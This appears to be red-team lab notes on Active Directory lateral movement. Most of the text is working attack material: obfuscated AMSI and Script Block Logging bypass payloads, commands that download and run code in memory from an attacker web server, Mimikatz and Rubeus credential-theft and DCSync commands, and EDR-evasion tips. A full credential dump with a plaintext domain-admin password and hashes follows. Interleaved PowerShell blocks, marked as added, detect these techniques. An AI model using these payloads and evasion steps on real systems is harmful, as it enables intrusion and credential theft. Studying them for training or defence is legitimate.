Every move by an attacker is carefully planned to go undetected. Reconnaissance is the first stage of
lateral movement. Once the threat actor has gained a foothold into the network, they gather information
on the network, its devices, and users. This helps them tactically move through the network without
raising suspicion.
These are a few tools and techniques that attackers may use for reconnaissance:

• Nmap: A network scanner that finds details about a network and the protocols running on it.

• Metasploit: A popular reconnaissance tool that can be used to probe for any vulnerabilities in the
network or servers.

• Bloodhound: An AD reconnaissance tool that identifies the relationship between AD objects such
as computers, groups, and users.

• Responder: A tool that can be used to poison Link-Local Multicast Name Resolution (LLMNR),
NetBIOS Name Service (NBT-NS), and Multicast DNS (mDNS) protocols to intercept and respond
to network traffic and collect user authentication credentials.

• PowerSploit: A collection of PowerShell scripts that can be used for reconnaissance.

• Recon-ng: An Open-Source Intelligence-based tool that is used for reconnaissance.

Credential dumping
This is the second stage of lateral movement. Once the attacker gains access to the network and has
studied it thoroughly, they will then attempt to elevate their privileges. This means that the attacker uses
privilege elevation techniques to gain access to user accounts and devices to move laterally through the
network.

Some of the common lateral movement techniques include:

• Kerberoasting: This technique extracts account credential hashes from AD and cracks them offline.

• Golden Ticket: This technique allows the attacker to forge Kerberos Ticket Granting Tickets,
thereby giving the attacker access to any resource on the AD.

• Silver Ticket: This technique allows the attacker to forge authentication tickets by cracking the
password hash of a service account. The attacker can use this to gain access to file shares, which
would allow them to find sensitive data and exfiltrate it.

• Keylogging: This records every keystroke of the user, usually without their knowledge. An attacker can use this to collect user behaviour and private data.

• Pass the hash: This is a technique where attackers use the password hash rather than the plain
text password to perform a valid NTLM authentication.

• Pass the ticket: This is a technique where attackers use stolen Kerberos tickets to authenticate to
a domain.

• RDP attack: This technique uses valid credentials to log in to a system remotely, and then perform
actions under the guise of the logged-in user.

• Server Message Block attack: This is a client-server communication protocol that can be abused by attackers to access file shares, allowing them to move laterally through a network.

Gaining access
If the attacker manages to evade the security controls in place and elevate their privileges within the
network, they're eventually able to gain access to the desired sensitive data. Since the attacker does this
using legitimate credentials, they can avoid detection.

PowerShell Remoting
PowerShell Remoting is a powerful feature that allows us to run PowerShell commands or scripts on
remote systems. It is based on the Windows Remote Management (WinRM) service, which enables the
execution of commands across multiple machines. This is particularly useful in large environments where
administrative tasks need to be performed on numerous machines without physically accessing them.

Overview of PowerShell Remoting

PowerShell Remoting enables administrators to:

• Execute commands on remote systems.

• Run scripts on remote systems.

• Establish interactive remote sessions.

• Manage remote systems from a centralized location.

WinRM and PowerShell Remoting Ports

Default Ports

1. HTTP (Unencrypted)

o Port 5985: This is the default port for WinRM over HTTP. It is used for unencrypted
communication, which is not recommended for production environments due to security
concerns.

2. HTTPS (Encrypted)

o Port 5986: This is the default port for WinRM over HTTPS. It provides encrypted
communication using SSL/TLS, which is the recommended configuration for secure
remote management.

Enabling PowerShell Remoting

To enable PowerShell Remoting on a machine, we need to configure WinRM. This can be done using the
following command:
Enable-PSRemoting -Force

The command requires administrative privileges. This command performs the following actions:

• Starts the WinRM service.

• Sets the WinRM service startup type to Automatic.

• Creates a listener to accept incoming remote requests.

• Enables a firewall rule that allows remote access.

Using PowerShell Remoting

Establishing a Remote Session
$session = New-PSSession -ComputerName RemoteComputer -Credential (Get-Credential)

Executing Commands on a Remote System

Once the session is established, we can execute commands using the Invoke-Command cmdlet:
Invoke-Command -Session $session -ScriptBlock { Get-Process }

Entering an Interactive Remote Session

For an interactive session, use the Enter-PSSession cmdlet:

Enter-PSSession -ComputerName RemoteComputer -Credential (Get-Credential)

This provides a command prompt on the remote system where we can run commands interactively.

Running Scripts on Remote Systems

We can also run entire scripts on remote systems using Invoke-Command:

Invoke-Command -Session $session -FilePath C:\Scripts\MyScript.ps1

Invoke-Command -ComputerName Computer1 -FilePath C:\Scripts\MyScript.ps1

Running Scripts on Multiple Remote Systems

Invoke-Command -Computername Computer1,Computer2 -Scriptblock { Get-Process }

Executing locally loaded functions on Remote machines

Invoke-Command -ComputerName Computer1 -ScriptBlock ${function:Get-PassHashes}

Invoke-Command -Session $session -ScriptBlock ${function:Get-PassHashes}

PowerShell Remoting is subject to system-wide transcription and deep script logging. We can use winrs
instead of PowerShell Remoting to evade that logging.
winrs -r:Computer1 -u:Computer1\administrator -p:<Password> hostname
We can also use winrm.vbs or the WSMan COM object (https://github.com/bohops/WSMan-WinRM).
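As an added defensive check that is not part of the lab notes, the following PowerShell audits what Enable-PSRemoting leaves behind on a host: the WinRM listeners (flagging HTTP-only listeners on 5985 versus HTTPS on 5986), the service start type and firewall rules, and recent shell creations in the WinRM operational log, which records both PowerShell Remoting and winrs sessions even when script block logging is bypassed. The function names are mine; it assumes an elevated PowerShell on the host being audited.

```powershell
# Added defensive check (not from the lab notes). Function names are mine.
# Assumes an elevated PowerShell session on the host being audited.

function Get-WinRMListenerReport {
    # Enable-PSRemoting creates an HTTP listener on 5985 by default. Each listener
    # under WSMan:\localhost\Listener exposes its settings as child items.
    foreach ($listener in Get-ChildItem -Path 'WSMan:\localhost\Listener') {
        $setting = @{}
        foreach ($item in Get-ChildItem -Path $listener.PSPath) {
            $setting[$item.Name] = $item.Value
        }
        $finding = if ($setting['Transport'] -eq 'HTTP') {
            'Unencrypted transport (default port 5985); prefer an HTTPS listener on 5986'
        } elseif (-not $setting['CertificateThumbprint']) {
            'HTTPS listener without a certificate thumbprint'
        } else {
            'OK'
        }
        [PSCustomObject]@{
            Listener  = $listener.Name
            Transport = $setting['Transport']
            Port      = $setting['Port']
            Address   = $setting['Address']
            Enabled   = $setting['Enabled']
            Finding   = $finding
        }
    }
}

function Get-WinRMServiceState {
    # Enable-PSRemoting also sets the service to Automatic and enables the
    # "Windows Remote Management" firewall rule group.
    $svc = Get-Service -Name WinRM
    $rules = Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -ErrorAction SilentlyContinue |
             Where-Object { $_.Enabled -eq 'True' }
    [PSCustomObject]@{
        Status               = $svc.Status
        StartType            = $svc.StartType
        EnabledFirewallRules = ($rules | Measure-Object).Count
    }
}

function Get-WSManShellCreations {
    param([int]$MaxEvents = 200)
    # Event 91 in the WinRM operational log is written for every incoming WSMan shell,
    # whether it came from New-PSSession/Invoke-Command (Microsoft.PowerShell resource)
    # or from winrs (cmd shell resource). Bypassing script block logging does not silence it.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $resource = if ($_.Message -match 'ResourceUri:\s*(\S+)') { $Matches[1] } else { $_.Message }
            [PSCustomObject]@{
                Time     = $_.TimeCreated
                Caller   = $_.UserId      # SID of the account that created the shell
                Resource = $resource
                Kind     = if ($resource -match '/shell/cmd') { 'winrs/cmd' } else { 'PowerShell Remoting' }
            }
        }
}

Get-WinRMListenerReport | Format-Table -AutoSize
Get-WinRMServiceState
Get-WSManShellCreations | Format-Table -AutoSize
```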

Dumping LSASS Credentials

Mimikatz can be used to dump credentials and tickets and to perform many other interesting attacks.

Dumping Credentials from LSASS

Using Invoke-Mimikatz
Invoke-Mimikatz is a popular script that makes the capabilities of the Mimikatz tool available from PowerShell.
Using code from ReflectivePEInjection, Mimikatz is loaded reflectively into memory, so all of the
functions of Mimikatz can be used from this script. The script requires administrative privileges for
dumping credentials from the local machine.
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Using SafetyKatz
SafetyKatz enhances the stealth and effectiveness of using Mimikatz by leveraging dynamic downloading,
in-memory execution, and obfuscation techniques. It's a valuable tool for penetration testers and red
teamers who need to perform credential dumping and other activities with Mimikatz while minimizing
the risk of detection. SafetyKatz.exe is a compiled version of the SafetyKatz script.
Safetykatz.exe "sekurlsa::ekeys"

Using SharpKatz
SharpKatz is a C# port of the popular Mimikatz tool, designed to perform similar tasks such as extracting
credentials, hashes, and Kerberos tickets from memory, but with a focus on .NET environments. SharpKatz
provides an alternative to the traditional Mimikatz tool and can be particularly useful in
environments where using a native C# tool is advantageous for evasion and operational flexibility.
SharpKatz.exe --Command ekeys

Using Dumpert.exe
Dumpert is a tool designed to extract (or "dump") credentials from the Local Security Authority Subsystem
Service (LSASS) process memory on Windows systems. It is often used in penetration testing and red
teaming to capture credentials that are stored in memory, similar to the way Mimikatz operates. However,
Dumpert utilizes techniques to avoid detection by traditional security measures.
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Using pypykatz
Pypykatz is a Python implementation of Mimikatz, designed to extract credentials from the memory of
the Local Security Authority Subsystem Service (LSASS) on Windows systems. It offers a cross-platform
approach to credential dumping by utilizing Python, making it highly flexible and integrable into various
environments and automation scripts.
pypykatz.exe live lsa

If we are using a Linux attack machine, we can use impacket and Physmem2profit.

Important Note: Avoid interacting with the LSASS process as much as possible, since every EDR monitors it
heavily. First look for credentials in DPAPI (browser cookies), the Credential Vault, the LSA registry key and
the SAM hive, since EDRs are not monitoring those.

Overpass the Hash attacks

Once we have the credentials, we can reuse them using the tools and techniques outlined here.

Using Invoke-Mimikatz
This requires elevated privileges.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user to impersonate> /domain:<domain> /aes256:<aes256 key of the user> /run:cmd.exe"'

Using SafetyKatz
This requires elevated privileges.
SafetyKatz.exe "sekurlsa::pth /user:<user to impersonate> /domain:<domain> /aes256:<aes256 key of the user> /run:cmd.exe" "exit"

For Overpass-the-Hash attacks, RC4 hashes can be used, but it is recommended to use AES keys instead,
as they are more operational security (OPSEC) safe. When RC4 hashes are used, tools like Microsoft
Defender for Identity can easily flag them as an Encryption Downgrade.

Both commands initiate the cmd.exe process with a logon type 9, which is similar to using runas /netonly.
Under logon type 9, accessing local resources reveals the original username, while accessing network
resources utilizes the new credentials.

Using Rubeus
Rubeus is a powerful post-exploitation tool designed to interact with Kerberos tickets. It can perform
various tasks related to Kerberos authentication, including ticket requests, renewals, extraction, and
manipulation. Rubeus is often used in red team operations to leverage Kerberos functionalities and
extract credentials without directly accessing the LSASS process.

Key Features of Rubeus

1. Kerberos Ticket Extraction: Extracts tickets from memory.

2. Pass-the-Ticket (PTT): Injects Kerberos tickets into the current session.

3. Ticket Renewal and Overpass-the-Hash (Pass-the-Key): Renews tickets or uses NTLM hashes to
request TGTs.

4. Ticket Request: Requests TGTs and TGS tickets.

5. Ticket Management: Lists, purges, or renews tickets.


6. Silver Ticket and Golden Ticket Forgery: Creates forged service tickets or TGTs.

7. S4U (Service for User): Performs S4U2Self and S4U2Proxy operations.

8. AS-REP Roasting: Extracts and cracks AS-REP hashes.

We can use the following command for an Overpass the Hash attack. It does not require administrative
privileges.
Rubeus.exe asktgt /user:<username> /rc4:<ntlm hash> /ptt

The following command requires elevation.

Rubeus.exe asktgt /user:<username> /aes256:<aes key> /opsec /createnetonly:<Process to start> /show /ptt

DCSync attack
DCSync is a technique used to extract credentials from Domain Controllers. In this attack, we mimic a
Domain Controller, leverage the Directory Replication Service Remote Protocol (MS-DRSR) and request
replication using the GetNCChanges function. In response, the Domain Controller returns replication data
that includes password hashes. This technique was added to Mimikatz in August 2015 by Benjamin Delpy
and Vincent Le Toux.

Domain Administrator privileges are required to execute this attack.

Using Invoke-Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Using SafetyKatz
BetterSafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

In the lab we use Invoke-Mimi.ps1, the obfuscated version of Invoke-Mimikatz.ps1. This tool is available
in the C:\Ad\Tools folder.
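As an added defensive counterpart to the Overpass-the-Hash notes above (logon type 9, RC4 encryption downgrade) and to this DCSync section, the following PowerShell pulls the matching signals from the Windows Security log. It is not part of the lab notes: the function names are mine, the two GUIDs are the standard DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, and it assumes logon auditing on the host and Kerberos Authentication Service plus Directory Service Access auditing on the DC.

```powershell
# Added detection example (not from the lab notes). Function names are mine.
# 4624 is read on the host where the overpass-the-hash happened; 4768 and 4662
# exist only on a Domain Controller.

function ConvertTo-EventData {
    # Flatten the <EventData> of a Security event into a name -> value hashtable.
    param([Parameter(Mandatory)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[[string]$d.Name] = [string]$d.'#text' }
    $data
}

function Find-NetOnlyLogons {
    # Logon type 9 (NewCredentials) is what sekurlsa::pth, SafetyKatz and
    # Rubeus /createnetonly produce, exactly like runas /netonly.
    param([int]$MaxEvents = 2000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertTo-EventData $_
            if ($d['LogonType'] -eq '9') {
                [PSCustomObject]@{ Time = $_.TimeCreated; Subject = $d['SubjectUserName']
                                   Target = $d['TargetUserName']; Process = $d['ProcessName'] }
            }
        }
}

function Find-Rc4TgtRequests {
    # 4768 TicketEncryptionType 0x17 is RC4-HMAC. For accounts that support AES this
    # is the "encryption downgrade" Defender for Identity flags, and it is what an
    # /rc4: or /ntlm: overpass-the-hash TGT request looks like on the DC.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertTo-EventData $_
            if ($d['TicketEncryptionType'] -eq '0x17' -and $d['Status'] -eq '0x0') {
                [PSCustomObject]@{ Time = $_.TimeCreated; Account = $d['TargetUserName']; Client = $d['IpAddress'] }
            }
        }
}

$ReplicationRights = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
)

function Find-ReplicationByNonDC {
    # DCSync issues the same GetNCChanges request a DC would, so the DC logs 4662
    # with the replication rights above in the Properties field. Any subject that is
    # not a DC computer account (or a known sync service account) is suspect.
    param([Parameter(Mandatory)][string[]]$KnownReplicators, [int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertTo-EventData $_
            $usesRight = $ReplicationRights | Where-Object { $d['Properties'] -match $_ }
            if ($usesRight -and ($d['SubjectUserName'] -notin $KnownReplicators)) {
                [PSCustomObject]@{ Time = $_.TimeCreated; Subject = $d['SubjectUserName']; Rights = ($usesRight -join ',') }
            }
        }
}

# Example run on a DC; the DC account name is a placeholder for this lab's DCORP-DC.
Find-NetOnlyLogons  | Format-Table -AutoSize
Find-Rc4TgtRequests | Format-Table -AutoSize
Find-ReplicationByNonDC -KnownReplicators @('DCORP-DC$') | Format-Table -AutoSize
```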

NetLoader
NetLoader.exe is a post-exploitation tool often used by penetration testers and red teamers to execute
payloads on remote systems. It is a lightweight loader designed to download and execute shellcode or
other malicious payloads directly from memory, which helps to avoid writing any malicious code to disk,
thereby reducing the likelihood of detection by antivirus software.

Key Features of NetLoader.exe

• Memory-Only Execution: Downloads and executes payloads directly in memory to avoid disk
operations and reduce detection.

• Network-Based Loading: Retrieves payloads from a specified URL, enabling flexible and remote
delivery of malicious code.

• Stealth: Designed to operate stealthily, bypassing many security mechanisms and detection tools.

• Flexible Payloads: Can be used to load various types of payloads, including shellcode and other
executable code.

Running Loader.exe to deliver payloads

C:\Ad\Tools\Loader.exe -Path http://172.16.100.163/Safetykatz.exe

Lateral Movement – 1
Dumping Credentials
We have previously obtained a reverse shell from the machine DCORP-CI as dcorp\ciadmin by abusing
Jenkins. Now we will use the reverse shell to laterally move across the network.

We will first run the Script Block Logging and AMSI bypasses on the reverse shell. Instead of running
InviShell, we will run the scripts that bypass Script Block Logging and AMSI separately. We host
sbloggingbypass.txt and amsibypass.txt on the HFS web server.

Content of sbloggingbypass.txt
[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'te
m.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP
'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+
'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+
'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)

Content of amsibypass.txt
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' )
) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') )
)."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

PS C:\Users\Administrator\.jenkins\workspace\Project9> iex (iwr -UseBasicParsing http://172.16.100.163/sbloggingbypass.txt)
PS C:\Users\Administrator\.jenkins\workspace\Project9> iex (iwr -UseBasicParsing http://172.16.100.163/amsibypass.txt)

Now we will host PowerView.ps1 in HFS and run it on DCORP-CI.

PS C:\Users\Administrator\.jenkins\workspace\Project9> iex((New-Object Net.WebClient).DownloadString('http://172.16.100.163/PowerView.ps1'))

Now from this server, we will run the function Find-DomainUserLocation to find any Domain Admin
sessions on machines where the current user ciadmin is an administrator.
PS C:\Users\Administrator\.jenkins\workspace\Project9> Find-DomainUserLocation -CheckAccess

UserDomain : dcorp
UserName : svcadmin
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
IPAddress : 172.16.4.44
SessionFrom :
SessionFromName :
LocalAdmin :

PS C:\Users\Administrator\.jenkins\workspace\Project9> Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
At line:7155 char:19
+ try { $Results.dispose() }
+ ~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodNotFound

From the output, we find that there is a domain admin (svcadmin) session on the machine dcorp-mgmt.
We can dump the credentials on that machine and obtain the privileges of the domain admin user
svcadmin.

Method – 1
We will use SafetyKatz.exe to dump all the credentials from the machine DCORP-MGMT. For this we first
download Loader.exe to DCORP-CI and from there transfer it to DCORP-MGMT. We then host SafetyKatz.exe
on the HFS web server on our student machine and execute it in memory on DCORP-MGMT to dump the
credentials there.

Step-1: Downloading Loader.exe to DCORP-CI.

Copy Loader.exe from the machine DCORP-STD163 to DCORP-CI. For this we host Loader.exe in HFS and
download it to DCORP-CI; from there we will copy it to DCORP-MGMT. We copy Loader.exe to
C:\Users\Public rather than to a temp directory, because copying executables to temp creates a lot of
noise since EDRs heavily monitor it.
PS C:\Users\Administrator\.jenkins\workspace\Project9> iwr http://172.16.100.163/Loader.exe -OutFile C:\Users\Public\Loader.exe
PS C:\Users\Administrator\.jenkins\workspace\Project9> cd C:\Users\Public
PS C:\Users\Public> dir

Directory: C:\Users\Public

Mode LastWriteTime Length Name


---- ------------- ------ ----
d-r--- 11/11/2022 12:53 AM Documents
d-r--- 5/8/2021 1:15 AM Downloads
d-r--- 5/8/2021 1:15 AM Music
d-r--- 5/8/2021 1:15 AM Pictures
d-r--- 5/8/2021 1:15 AM Videos
-a---- 6/21/2024 9:29 PM 201216 Loader.exe

Step-2: Transferring Loader.exe to DCORP-MGMT.

We will now transfer Loader.exe to DCORP-MGMT.

PS C:\Users\Public> echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\loader.exe
Does \\dcorp-mgmt\C$\Users\Public\loader.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\Users\Public\Loader.exe
1 File(s) copied

Step-3: Dumping Credentials

Now we can host SafetyKatz.exe in HFS on our student machine and execute it on DCORP-MGMT in
memory. But Defender detects it easily because we are downloading it from an unknown web server. To
avoid detection, we redirect a port on DCORP-MGMT to port 80 on our student machine and then
execute it in memory.
PS C:\Users\Public> $null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.163"

If we send any request to port 8080 on DCORP-MGMT, then it is redirected to port 80 of our student
machine.
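As an added defensive check that is not part of the lab notes: a netsh portproxy rule like the one above survives reboots because netsh stores it in the registry, so a defender can enumerate such redirects on any host (here over the same PowerShell Remoting the notes use) and flag connect targets outside the expected set. The function names and the allow-list are mine.

```powershell
# Added defensive check (not from the lab notes). Function names are mine.
# netsh interface portproxy persists its rules under this key; value names are
# "listenaddress/listenport" and value data are "connectaddress/connectport".

function Get-PortProxyRule {
    param([string[]]$AllowedTargets = @())   # connect addresses considered legitimate
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy'
    if (-not (Test-Path $base)) { return }   # no rule has ever been created on this host
    # v4tov4, v4tov6, v6tov4 and v6tov6 subkeys each hold a 'tcp' subkey with the rules.
    foreach ($family in Get-ChildItem -Path $base) {
        $tcpKey = Join-Path $family.PSPath 'tcp'
        if (-not (Test-Path $tcpKey)) { continue }
        $key = Get-Item -Path $tcpKey
        foreach ($name in $key.GetValueNames()) {
            $listen  = $name -split '/'
            $connect = ([string]$key.GetValue($name)) -split '/'
            [PSCustomObject]@{
                Family         = $family.PSChildName
                ListenAddress  = $listen[0]
                ListenPort     = [int]$listen[1]
                ConnectAddress = $connect[0]
                ConnectPort    = [int]$connect[1]
                Suspicious     = ($connect[0] -notin $AllowedTargets)
            }
        }
    }
}

function Invoke-PortProxyAudit {
    # Run the check across several hosts over PowerShell Remoting and keep only suspect rules.
    param([Parameter(Mandatory)][string[]]$ComputerName, [string[]]$AllowedTargets = @())
    Invoke-Command -ComputerName $ComputerName -ScriptBlock ${function:Get-PortProxyRule} `
                   -ArgumentList (,$AllowedTargets) |
        Where-Object Suspicious |
        Select-Object PSComputerName, Family, ListenAddress, ListenPort, ConnectAddress, ConnectPort
}

# Local run; the allow-list is a placeholder for whatever the environment legitimately proxies.
Get-PortProxyRule -AllowedTargets @('10.0.0.5') | Format-Table -AutoSize
```

The rule from the lab would show up as ListenAddress 0.0.0.0, ListenPort 8080, ConnectAddress 172.16.100.163, ConnectPort 80 with Suspicious set to True.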

We will now dump credentials.

PS C:\users\Public> $null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
[*] Applying amsi patch: true
[*] Applying etw patch: true
[*] Decrypting packed exe...
[!] ~Flangvik - Arno0x0x Edition - #NetLoader
[+] Patched!
[+] Starting http://127.0.0.1:8080/SafetyKatz.exe with args ''

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # http://127.0.0.1:8080/SafetyKatz.exe
ERROR mimikatz_doLocal ; "http://127.0.0.1:8080/SafetyKatz.exe" command of "standard" module not
found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # sekurlsa::ekeys

Authentication Id : 0 ; 56541 (00000000:0000dcdd)


Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118

* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
* Key List :
aes256_hmac 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
aes128_hmac 8c0a8695795df6c9a85c4fb588ad6cbd
rc4_hmac_nt b38ff50264b74508085d82c69794a4d8
rc4_hmac_old b38ff50264b74508085d82c69794a4d8
rc4_md4 b38ff50264b74508085d82c69794a4d8
rc4_hmac_nt_exp b38ff50264b74508085d82c69794a4d8
rc4_hmac_old_exp b38ff50264b74508085d82c69794a4d8

Authentication Id : 0 ; 54690 (00000000:0000d5a2)


Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2/21/2024 3:15:54 AM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 996 (00000000:000003e4)


Session : Service from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-20

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20862 (00000000:0000517e)


Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-0

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 1027589 (00000000:000fae05)


Session : Interactive from 0
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:57:38 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
rc4_hmac_nt 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old 95e2cd7ff77379e34c6e46265e75d754
rc4_md4 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_nt_exp 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old_exp 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 359605 (00000000:00057cb5)


Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:25:49 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
rc4_hmac_nt 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old 95e2cd7ff77379e34c6e46265e75d754
rc4_md4 95e2cd7ff77379e34c6e46265e75d754
